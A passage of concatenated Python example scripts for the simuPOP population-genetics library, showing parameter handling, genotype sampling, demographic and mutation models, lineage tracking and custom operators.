replicates.''',\n 'validator': simuOpt.valueListOf(simuOpt.valueBetween(0, 1))\n },\n {'name': 'rep',\n 'default': 5,\n 'label': 'Number of replicates',\n 'type': 'number',\n 'description': 'Number of replicates to simulate.',\n 'validator': simuOpt.valueGT(0)\n }, \n {'name': 'pop',\n 'default': 'CEU',\n 'label': 'Initial population',\n 'type': ('chooseOneOf', ['CEU', 'YRI', 'CHB+JPT']),\n 'description': '''Use one of the HapMap sim.populations as the initial\n sim.Population for this simulation. You can choose from:\n |YRI: 33 trios from the Yoruba people in Nigeria (Africa)\n |CEU: 30 trios from Utah with European ancestry (European)\n |CHB+JPT: 90 unrelated individuals from China and Japan (Asia)\n ''',\n }\n]\npars = simuOpt.Params(options, 'A demo simulation')\nprint(pars.usage())\n# You can manually feed parameters...\npars.processArgs(['--rep=10'])\npars.rep\n#begin_ignore\nimport sys\noldArg = [x for x in sys.argv]\nsys.argv.pop()\nimport os\nif not os.path.isfile('figures/getParam.png'):\n print('Run a GUI if getParam has not been runned')\nelse:\n sys.argv = ['getParam.py', '--rate=[0.25]', '--rep=5', '--pop=\"CEU\"']\n simuOpt.setOptions(gui=False)\n\nimport simuPOP as sim\npars.processArgs(sys.argv)\n#end_ignore\nif not pars.getParam():\n sys.exit(1)\n\n#begin_ignore\nsys.argv = oldArg\n#end_ignore\npars.saveConfig('sample.cfg')\n# post-process parameters\npars.rate\npars.rep\npars.rate = pars.rate * pars.rep\n# extract parameters as a dictionary or a list\npars.asDict()\npars.asList()\n# Default value of parameter rep is changed\n# additional attribute is added.\npar1 = simuOpt.Params(options, # all parameters with default values\n rep=50, # default value of rep is changed\n additional=10 # derived parameters are added\n)\n# print all parameters except for derived ones.\nprint(par1.asDict())\n# All parameters are derived ...\npar2 = simuOpt.Params(rep=50, pop='CEU', rate=[0.5])\nprint(par2.asDict())\nprint(par2.rep, par2.pop)\n#end_file\n\n#begin_file log/paramFunc.py\nimport types, simuOpt\npars = simuOpt.Params(doc='A demo simulation')\npars.addOption('rate', [0.01], label = 'Recombination rate',\n type = 'numbers', description = '''Recombination rate for each replicate.\n If a single value is given, it will be used for all replicates.''')\npars.addOption('rep', 5, label = 'Number of replicates', type = 'integer',\n description = 'Number of replicates to simulate.',\n validator = simuOpt.valueGT(0)) \npars.addOption('pop', 'CEU', label = 'Initial population',\n type = ('chooseOneOf', ['CEU', 'YRI', 'CHB+JPT']),\n description = '''Use one of the HapMap sim.populations as the initial\n sim.Population for this simulation. You can choose from:\n |YRI: 33 trios from the Yoruba people in Nigeria (Africa)\n |CEU: 30 trios from Utah with European ancestry (European)\n |CHB+JPT: 90 unrelated individuals from China and Japan (Asia)\n ''')\nprint(pars.usage())\n#end_file\n\n\n#begin_file log/randomSample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.sampling import drawRandomSample\npop = sim.Population([2000]*5, loci=1)\n# sample from the whole population\nsample = drawRandomSample(pop, sizes=500)\nprint(sample.subPopSizes())\n# sample from each subpopulation\nsample = drawRandomSample(pop, sizes=[100]*5)\nprint(sample.subPopSizes())\n#end_file\n\n\n#begin_file log/caseControlSample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.sampling import drawCaseControlSamples\npop = sim.Population([10000], loci=5)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.maPenetrance(pop, loci=2, penetrance=[0.11, 0.15, 0.20])\n# draw multiple case control sample\nsamples = drawCaseControlSamples(pop, cases=500, controls=500, numOfSamples=5)\nfor sample in samples:\n sim.stat(sample, association=range(5))\n print(', '.join(['%.6f' % sample.dvars().Allele_ChiSq_p[x] for x in range(5)]))\n\n#end_file\n\n\n#begin_file log/sampleAffectedSibpair.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import indexToID\npop = sim.Population(size=15, loci=5, infoFields=['father_idx', 'mother_idx'], ancGen=2)\npop.evolve(\n preOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.7, 0.3]),\n ],\n matingScheme=sim.RandomMating(numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[sim.MendelianGenoTransmitter(), sim.ParentsTagger()]),\n postOps=sim.MaPenetrance(loci=3, penetrance=(0.1, 0.4, 0.7)),\n gen = 5\n)\nindexToID(pop, reset=True)\n# three information fields were added\nprint(pop.infoFields())\n# save this population for future use\npop.save('log/pedigree.pop')\n\nfrom simuPOP.sampling import drawAffectedSibpairSample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawAffectedSibpairSample(pop, families=2)\n#end_file\n\n\n#begin_file log/sampleNuclearFamily.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawNuclearFamilySample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawNuclearFamilySample(pop, families=2, numOffspring=(2,4),\n affectedParents=(1,2), affectedOffspring=(1, 3))\n# try to separate two families?\nsample.asPedigree()\n#= sim.Pedigree(sample, loci=sim.ALL_AVAIL, infoFields=sim.ALL_AVAIL)\nsample.addInfoFields('ped_id')\n# return size of families\nsz = sample.identifyFamilies(pedField='ped_id')\nprint(sz)\nped1 = sample.extractIndividuals(IDs=0, idField='ped_id')\n# print the ID of all individuals in the first pedigree\nprint([ind.ind_id for ind in ped1.allIndividuals()])\n#end_file\n\n\n\n#begin_file log/sampleThreeGenFamily.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawThreeGenFamilySample\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawThreeGenFamilySample(pop, families=2, numOffspring=(1, 3),\n pedSize=(8, 15), numOfAffected=(2, 5))\n#end_file\n\n\n#begin_file log/combinedSampling.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12347)\n#end_ignore\nfrom simuPOP.sampling import drawCombinedSample, AffectedSibpairSampler, NuclearFamilySampler\npop = sim.loadPopulation('log/pedigree.pop')\nsample = drawCombinedSample(pop, samplers = [\n AffectedSibpairSampler(families=1),\n NuclearFamilySampler(families=1, numOffspring=(2,4), affectedParents=(1,2), affectedOffspring=(1,3))\n ])\n#end_file\n\n\n#begin_file log/samplingVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create an age-structured population with a disease\nimport random\npop = sim.Population(10000, loci=10, infoFields='age')\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.initInfo(pop, lambda: random.randint(0, 70), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=(40, 60), field='age'))\nsim.maPenetrance(pop, loci=5, penetrance=(0.1, 0.2, 0.3))\n#\nfrom simuPOP.sampling import drawCaseControlSample\nsample = drawCaseControlSample(pop, cases=500, controls=500, subPops=[(0,1)])\nageInSample = sample.indInfo('age')\nprint(min(ageInSample), max(ageInSample))\n#end_file\n\n#begin_file log/samplingSeparateVSPs.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create an age-structured population with a disease\nimport random\npop = sim.Population(10000, loci=10, infoFields='age')\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.initInfo(pop, lambda: random.randint(0, 70), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=(20, 40), field='age'))\n# different age group has different penetrance\nsim.maPenetrance(pop, loci=5, penetrance=(0.1, 0.2, 0.3), subPops=[(0,1)])\nsim.maPenetrance(pop, loci=5, penetrance=(0.2, 0.4, 0.6), subPops=[(0,2)])\n# count the number of affected individuals in each group\nsim.stat(pop, numOfAffected=True, subPops=[(0,1), (0,2)], vars='numOfAffected_sp')\nprint(pop.dvars((0,1)).numOfAffected, pop.dvars((0,2)).numOfAffected)\n#\nfrom simuPOP.sampling import drawRandomSample\nsample = drawRandomSample(pop, sizes=[500, 500], subPops=[(0,1), (0,2)])\n# virtual subpopulations are rearranged to different subpopulations.\nprint(sample.subPopSizes())\n#end_file\n\n\n#begin_file log/reichDemo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport math\ndef demo_model(model, N0=1000, N1=100000, G0=500, G1=500):\n '''Return a demographic function \n model: linear or exponential\n N0: Initial sim.population size.\n N1: Ending sim.population size.\n G0: Length of burn-in stage.\n G1: Length of sim.population expansion stage.\n '''\n def ins_expansion(gen):\n if gen < G0:\n return N0\n else:\n return N1\n rate = (math.log(N1) - math.log(N0))/G1\n def exp_expansion(gen):\n if gen < G0:\n return N0\n else: \n return int(N0 * math.exp((gen - G0) * rate))\n if model == 'instant':\n return ins_expansion\n elif model == 'exponential':\n return exp_expansion\n\n# when needed, create a demographic function as follows\ndemo_func = demo_model('exponential', 1000, 100000, 500, 500)\n# sim.population size at generation 700\nprint(demo_func(700))\n#end_file\n\n#begin_file log/reichstat.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nclass ne(sim.PyOperator):\n '''Define an operator that calculates effective number of\n alleles at given loci. The result is saved in a population\n variable ne.\n '''\n def __init__(self, loci, *args, **kwargs):\n self.loci = loci\n sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n #\n def calcNe(self, pop):\n sim.stat(pop, alleleFreq=self.loci)\n ne = {}\n for loc in self.loci:\n freq = pop.dvars().alleleFreq[loc]\n sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n if sumFreq == 0:\n ne[loc] = 0\n else:\n ne[loc] = 1. / sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n # save the result to the sim.Population.\n pop.dvars().ne = ne\n return True\n\ndef Ne(pop, loci):\n '''Function form of operator ne'''\n ne(loci).apply(pop)\n return pop.dvars().ne\n\npop = sim.Population(100, loci=[10])\nsim.initGenotype(pop, freq=[.2] * 5)\nprint(Ne(pop, loci=[2, 4]))\n#end_file\n\n#begin_file log/reichEvolve.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\n#begin_ignore\nimport math\ndef demo_model(model, N0=1000, N1=100000, G0=500, G1=500):\n '''Return a demographic function \n model: linear or exponential\n N0: Initial sim.population size.\n N1: Ending sim.population size.\n G0: Length of burn-in stage.\n G1: Length of sim.population expansion stage.\n '''\n rate = (math.log(N1) - math.log(N0))/G1\n def ins_expansion(gen):\n if gen < G0:\n return N0\n else:\n return N1\n \n def exp_expansion(gen):\n if gen < G0:\n return N0\n else: \n return int(N0 * math.exp((gen - G0) * rate))\n \n if model == 'instant':\n return ins_expansion\n elif model == 'exponential':\n return exp_expansion\n\nclass ne(sim.PyOperator):\n '''Define an operator that calculates effective number of\n alleles at given loci. The result is saved in a population\n variable ne.\n '''\n def __init__(self, loci, *args, **kwargs):\n self.loci = loci\n sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n \n def calcNe(self, pop):\n sim.stat(pop, alleleFreq=self.loci)\n ne = {}\n for loc in self.loci:\n freq = pop.dvars().alleleFreq[loc]\n sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n if sumFreq == 0:\n ne[loc] = 0\n else:\n ne[loc] = 1. / sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n # save the result to the sim.Population.\n pop.dvars().ne = ne\n return True\n\n#end_ignore\n\ndef simulate(model, N0, N1, G0, G1, spec, s, mu, k):\n '''Evolve a sim.Population using given demographic model\n and observe the evolution of its allelic spectrum.\n model: type of demographic model.\n N0, N1, G0, G1: parameters of demographic model.\n spec: initial allelic spectrum, should be a list of allele\n frequencies for each allele.\n s: selection pressure.\n mu: mutation rate.\n k: k for the k-allele model\n '''\n demo_func = demo_model(model, N0, N1, G0, G1)\n pop = sim.Population(size=demo_func(0), loci=1, infoFields='fitness')\n pop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=spec, loci=0)\n ],\n matingScheme=sim.RandomMating(subPopSize=demo_func),\n postOps=[\n sim.KAlleleMutator(k=k, rates=mu),\n sim.MaSelector(loci=0, fitness=[1, 1, 1 - s], wildtype=0),\n ne(loci=[0], step=100),\n sim.PyEval(r'\"%d: %.2f\\t%.2f\\n\" % (gen, 1 - alleleFreq[0][0], ne[0])',\n step=100),\n ],\n gen = G0 + G1\n )\n\nsimulate('instant', 1000, 10000, 500, 500, [0.9]+[0.02]*5, 0.01, 1e-4, 200)\n#end_file\n\n#begin_file log/simuCDCV.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\n#!/usr/bin/env python\n#\n# Author: Bo Peng\n# Purpose: A real world example for simuPOP user's guide.\n#\n'''\nSimulation the evolution of allelic spectra (number and frequencies\nof alleles at a locus), under the influence of sim.population expansion,\nmutation, and natural selection.\n'''\nimport simuOpt\nsimuOpt.setOptions(quiet=True, alleleType='long')\nimport simuPOP as sim\nimport sys, types, os, math\noptions = [\n {'name': 'demo',\n 'default': 'instant',\n 'label': 'Population growth model',\n 'description': 'How does a sim.Population grow from N0 to N1.',\n 'type': ('chooseOneOf', ['instant', 'exponential']),\n },\n {'name': 'N0',\n 'default': 10000,\n 'label': 'Initial sim.population size',\n 'type': 'integer',\n 'description': '''Initial sim.population size. This size will be maintained\n till the end of burnin stage''',\n 'validator': simuOpt.valueGT(0)\n },\n {'name': 'N1',\n 'default': 100000,\n 'label': 'Final sim.population size',\n 'type': 'integer',\n 'description': 'Ending sim.population size (after sim.population expansion)',\n 'validator': simuOpt.valueGT(0)\n }, \n {'name': 'G0',\n 'default': 500,\n 'label': 'Length of burn-in stage',\n 'type': 'integer',\n 'description': 'Number of generations of the burn in stage.',\n 'validator': simuOpt.valueGT(0)\n },\n {'name': 'G1',\n 'default': 1000,\n 'label': 'Length of expansion stage',\n 'type': 'integer',\n 'description': 'Number of geneartions of the sim.population expansion stage',\n 'validator': simuOpt.valueGT(0)\n },\n {'name': 'spec',\n 'default': [0.9] + [0.02]*5,\n 'label': 'Initial allelic spectrum',\n 'type': 'numbers',\n 'description': '''Initial allelic spectrum, should be a list of allele\n frequencies, for allele 0, 1, 2, ... respectively.''',\n 'validator': simuOpt.valueListOf(simuOpt.valueBetween(0, 1)),\n },\n {'name': 's',\n 'default': 0.01,\n 'label': 'Selection pressure',\n 'type': 'number',\n 'description': '''Selection coefficient for homozygtes (aa) genotype.\n A recessive selection model is used so the fitness values of\n genotypes AA, Aa and aa are 1, 1 and 1-s respectively.''',\n 'validator': simuOpt.valueGT(-1),\n },\n {'name': 'mu',\n 'default': 1e-4,\n 'label': 'Mutation rate',\n 'type': 'number',\n 'description': 'Mutation rate of a k-allele mutation model',\n 'validator': simuOpt.valueBetween(0, 1),\n },\n {'name': 'k',\n 'default': 200,\n 'label': 'Maximum allelic state',\n 'type': 'integer',\n 'description': 'Maximum allelic state for a k-allele mutation model',\n 'validator': simuOpt.valueGT(1),\n },\n]\n\ndef demo_model(type, N0=1000, N1=100000, G0=500, G1=500):\n '''Return a demographic function \n type: linear or exponential\n N0: Initial sim.population size.\n N1: Ending sim.population size.\n G0: Length of burn-in stage.\n G1: Length of sim.population expansion stage.\n '''\n rate = (math.log(N1) - math.log(N0))/G1\n def ins_expansion(gen):\n if gen < G0:\n return N0\n else:\n return N1\n \n def exp_expansion(gen):\n if gen < G0:\n return N0\n else: \n return int(N0 * math.exp((gen - G0) * rate))\n \n if type == 'instant':\n return ins_expansion\n elif type == 'exponential':\n return exp_expansion\n\nclass ne(sim.PyOperator):\n '''Define an operator that calculates effective number of\n alleles at given loci. The result is saved in a population\n variable ne.\n '''\n def __init__(self, loci, *args, **kwargs):\n self.loci = loci\n sim.PyOperator.__init__(self, func=self.calcNe, *args, **kwargs)\n \n def calcNe(self, pop):\n sim.stat(pop, alleleFreq=self.loci)\n ne = {}\n for loc in self.loci:\n freq = pop.dvars().alleleFreq[loc]\n sumFreq = 1 - pop.dvars().alleleFreq[loc][0]\n if sumFreq == 0:\n ne[loc] = 0\n else:\n ne[loc] = 1. / sum([(freq[x]/sumFreq)**2 for x in list(freq.keys()) if x != 0])\n # save the result to the sim.Population.\n pop.dvars().ne = ne\n return True\n\ndef simuCDCV(model, N0, N1, G0, G1, spec, s, mu, k):\n '''Evolve a sim.Population using given demographic model\n and observe the evolution of its allelic spectrum.\n model: type of demographic model.\n N0, N1, G0, G1: parameters of demographic model.\n spec: initial allelic spectrum, should be a list of allele\n frequencies for each allele.\n s: selection pressure.\n mu: mutation rate.\n k: maximum allele for the k-allele model\n '''\n demo_func = demo_model(model, N0, N1, G0, G1)\n print(demo_func(0))\n pop = sim.Population(size=demo_func(0), loci=1, infoFields='fitness')\n pop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=spec, loci=0)\n ],\n matingScheme=sim.RandomMating(subPopSize=demo_func),\n postOps=[\n sim.KAlleleMutator(rates=mu, k=k),\n sim.MaSelector(loci=0, fitness=[1, 1, 1 - s], wildtype=0),\n ne(loci=(0,), step=100),\n sim.PyEval(r'\"%d: %.2f\\t%.2f\\n\" % (gen, 1 - alleleFreq[0][0], ne[0])',\n step=100),\n ],\n gen = G0 + G1\n )\n return pop\n\nif __name__ == '__main__':\n # get parameters\n par = simuOpt.Params(options, __doc__)\n if not par.getParam():\n sys.exit(1)\n \n if not sum(par.spec) == 1:\n print('Initial allelic spectrum should add up to 1.')\n sys.exit(1)\n # save user input to a configuration file\n par.saveConfig('simuCDCV.cfg')\n #\n simuCDCV(*par.asList())\n\n#begin_ignore\nimport os\nif os.path.isfile('log/simuCDCV.py'):\n out = os.popen('python log/simuCDCV.py -h')\n hlp = open('log/simuCDCV.hlp', 'w')\n hlp.write(out.read())\n hlp.close()\n\n#end_ignore\n#end_file\n\n\n#begin_file log/randomSeed.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\ndef simulate():\n pop = sim.Population(1000, loci=10, infoFields='age')\n pop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.InitInfo(lambda: random.randint(0, 10), infoFields='age')\n ],\n matingScheme=sim.RandomMating(),\n finalOps=sim.Stat(alleleFreq=0),\n gen=100\n )\n return pop.dvars().alleleFreq[0][0]\n\nseed = sim.getRNG().seed()\nrandom.seed(seed)\nprint('%.4f' % simulate())\n# will yield different result\nprint('%.4f' % simulate())\nsim.setRNG(seed=seed)\nrandom.seed(seed)\n# will yield identical result because the same seeds are used\nprint('%.4f' % simulate())\n#end_file\n\n\n#begin_file log/debug.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# redirect system stderr\nimport sys\ndebugOutput = open('debug.txt', 'w')\nold_stderr = sys.stderr\nsys.stderr = debugOutput\n# start simulation\nsimu = sim.Simulator(sim.Population(100, loci=1), rep=5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.1, 0.9])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.IfElse('alleleNum[0][0] == 0',\n ifOps=[\n # the is None part makes the function return True\n sim.PyOperator(lambda : sim.turnOnDebug(\"DBG_MUTATOR\") is None),\n sim.PointMutator(loci=0, allele=0, inds=0),\n ],\n elseOps=sim.PyOperator(lambda : sim.turnOffDebug(\"DBG_MUTATOR\") is None)),\n ],\n gen = 100\n)\n# replace standard stdandard error\nsys.stderr = old_stderr\ndebugOutput.close()\nprint(''.join(open('debug.txt').readlines()[:5]))\n#begin_ignore\nsim.turnOffDebug(\"DBG_MUTATOR\")\n#end_ignore\n#end_file\n\n\n#begin_file log/geneticContribution.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[10]*4)\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.25]*4),\n sim.InitLineage(range(1000), mode=sim.PER_INDIVIDUAL),\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.001)),\n gen = 100\n)\n# average number of 'contributors'\nnum_contributors = [len(set(ind.lineage())) for ind in pop.individuals()]\nprint('Average number of contributors is %.2f' % (sum(num_contributors) / float(pop.popSize())))\n# percent of genetic information from each ancestor (baseline is 1/1000)\nlineage = pop.lineage()\nlin_perc = [lineage.count(x)/float(len(lineage)) for x in range(1000)]\n# how many of ancestors do not have any allele left?\nprint('Number of ancestors with no allele left: %d' % lin_perc.count(0.))\n# top five contributors\nlin_perc.sort()\nlin_perc.reverse()\nprint('Top contributors (started with 0.001): %.5f %.5f %.5f' % (lin_perc[0], lin_perc[1], lin_perc[2]))\n#end_file\n\n\n#begin_file log/ageOfMutants.py\nimport simuOpt\nsimuOpt.setOptions(alleleType='lineage', quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=[10]*10, infoFields='ind_id')\n# just to make sure IDs starts from 1\nsim.IdTagger().reset(1)\npop.evolve(\n initOps = [\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.3, 0.4, 0.1]),\n sim.IdTagger(),\n sim.InitLineage(mode=sim.FROM_INFO),\n ],\n # an extremely high mutation rate, just for demonstration\n preOps = sim.AcgtMutator(rate=0.01, model='JC69'),\n matingScheme=sim.RandomMating(\n ops=[\n sim.IdTagger(),\n sim.MendelianGenoTransmitter(),\n ]\n ),\n gen = 10\n)\nlin = pop.lineage()\n# Number of alleles from each generation\nfor gen in range(10):\n id_start = gen*10000 + 1\n id_end = (gen+1)*10000\n num_mut = len([x for x in lin if x >= id_start and x <= id_end])\n print('Gen %d: %5.2f %%' % (gen, num_mut / (2*10000*100.) * 100))\n\n#end_file\n\n\n\n\n#begin_file log/mitochondrial.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[5]*4,\n # one autosome, two sex chromosomes, and one mitochondrial chromosomes\n chromTypes=[sim.AUTOSOME, sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL],\n infoFields=['fitness'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.25]*4)\n ],\n preOps=[\n sim.MapSelector(loci=17, fitness={(0,): 1, (1,): 1, (2,): 1, (3,): 0.4})\n ],\n matingScheme=sim.RandomMating(ops= [\n sim.Recombinator(rates=0.1),\n sim.MitochondrialGenoTransmitter(),\n ]),\n postOps=[\n sim.Stat(alleleFreq=17, step=10),\n sim.PyEval(r'\"%.2f %.2f %.2f %.2f\\n\" % (alleleNum[17][0],'\n 'alleleNum[17][1], alleleNum[17][2], alleleNum[17][3])', step=10),\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/mtDNA_evolve.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\ndef alleleCount(pop):\n summary = [0]* 6\n for ind in pop.individuals():\n geno = ind.genotype(ploidy=0)\n summary[geno[0] + geno[2] + geno[4] + geno[6] + geno[8]] += 1\n print('%d %s' % (pop.dvars().gen, summary))\n return True\n\npop = sim.Population(1000, loci=[2]*5, chromTypes=[sim.CUSTOMIZED]*5)\npop.evolve(\n # every one has miDNAs 10, 00, 00, 00, 00\n initOps=[\n sim.InitGenotype(haplotypes=[[1]+[0]*9]),\n ],\n # random select cells for cytoplasmic segregation\n matingScheme=sim.RandomSelection(ops= [\n sim.MitochondrialGenoTransmitter(),\n ]),\n postOps=sim.PyOperator(func=alleleCount, step=10),\n gen = 51\n)\n#end_file\n\n#begin_file log/importData.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef importData(filename):\n 'Read data from ``filename`` and create a population'\n data = open(filename)\n header = data.readline()\n fields = header.split(',')\n # columns 1, 3, 5, ..., without trailing '_1'\n names = [fields[x].strip()[:-2] for x in range(1, len(fields), 2)]\n popSize = 0\n alleleNames = set()\n for line in data.readlines():\n # get all allele names\n alleleNames |= set([x.strip() for x in line.split(',')[1:]])\n popSize += 1\n # create a population\n alleleNames = list(alleleNames)\n pop = sim.Population(size=popSize, loci=len(names), lociNames=names,\n alleleNames=alleleNames)\n # start from beginning of the file again\n data.seek(0)\n # discard the first line\n data.readline()\n for ind, line in zip(pop.individuals(), data.readlines()):\n fields = [x.strip() for x in line.split(',')]\n sex = sim.MALE if fields[0] == '1' else sim.FEMALE\n ploidy0 = [alleleNames.index(fields[x]) for x in range(1, len(fields), 2)]\n ploidy1 = [alleleNames.index(fields[x]) for x in range(2, len(fields), 2)]\n ind.setGenotype(ploidy0, 0)\n ind.setGenotype(ploidy1, 1)\n ind.setSex(sex)\n # close the file\n data.close()\n return pop\n\nfrom simuPOP.utils import saveCSV\npop = sim.Population(size=[10], loci=[3, 2], lociNames=['rs1', 'rs2', 'rs3', 'rs4', 'rs5'],\n alleleNames=['A', 'B'])\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.5, 0.5])\n# output sex but not affection status.\nsaveCSV(pop, filename='sample.csv', affectionFormatter=None,\n sexFormatter={sim.MALE:1, sim.FEMALE:2})\n# have a look at the file\nprint(open('sample.csv').read())\npop1 = importData('sample.csv')\nsim.dump(pop1)\n#end_file\n\n\n#begin_file log/newOperator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nclass dynaMutator(sim.PyOperator):\n '''This mutator mutates commom loci with low mutation rate and rare\n loci with high mutation rate, as an attempt to raise allele frequency\n of rare loci to an higher level.'''\n def __init__(self, cutoff, mu1, mu2, *args, **kwargs):\n self.cutoff = cutoff\n self.mu1 = mu1\n self.mu2 = mu2\n sim.PyOperator.__init__(self, func=self.mutate, *args, **kwargs)\n #\n def mutate(self, pop):\n sim.stat(pop, alleleFreq=range(pop.totNumLoci()))\n for i in range(pop.totNumLoci()):\n # Get the frequency of allele 1 (disease allele)\n if pop.dvars().alleleFreq[i][1] < self.cutoff:\n sim.kAlleleMutate(pop, k=2, rates=self.mu1, loci=[i])\n else:\n sim.kAlleleMutate(pop, k=2, rates=self.mu2, loci=[i])\n return True\n\npop = sim.Population(size=10000, loci=[2, 3])\npop.evolve(\n initOps=[ \n sim.InitSex(),\n sim.InitGenotype(freq=[.99, .01], loci=[0, 2, 4]),\n sim.InitGenotype(freq=[.8, .2], loci=[1, 3])\n ],\n preOps=dynaMutator(cutoff=.2, mu1=1e-2, mu2=1e-5),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(5), step=10),\n sim.PyEval(r\"' '.join(['%.2f' % alleleFreq[x][1] for x in range(5)]) + '\\n'\",\n step=10),\n ],\n gen = 31\n) \n#end_file\n\n#begin_file log/RandomMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import *\n#begin_ignore\nsetRNG(seed=12345)\n#end_ignore\ndef RandomMating(numOffspring=1., sexMode=RANDOM_SEX,\n ops=MendelianGenoTransmitter(), subPopSize=[],\n subPops=ALL_AVAIL, weight=0, selectionField='fitness'):\n 'A basic diploid sexual random mating scheme.'\n return HomoMating(\n chooser=RandomParentsChooser(True, selectionField),\n generator=OffspringGenerator(ops, numOffspring, sexMode),\n subPopSize=subPopSize,\n subPops=subPops,\n weight=weight)\n\n#end_file\n\n#begin_file log/sequentialSelfing.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=5*3, infoFields='parent_idx')\npop.evolve(\n initOps=[sim.InitGenotype(freq=[0.2]*5)],\n preOps=sim.Dumper(structure=False, max=5),\n matingScheme=sim.HomoMating(\n sim.SequentialParentChooser(),\n sim.OffspringGenerator(ops=[\n sim.SelfingGenoTransmitter(),\n sim.ParentsTagger(infoFields='parent_idx'),\n ])\n ),\n 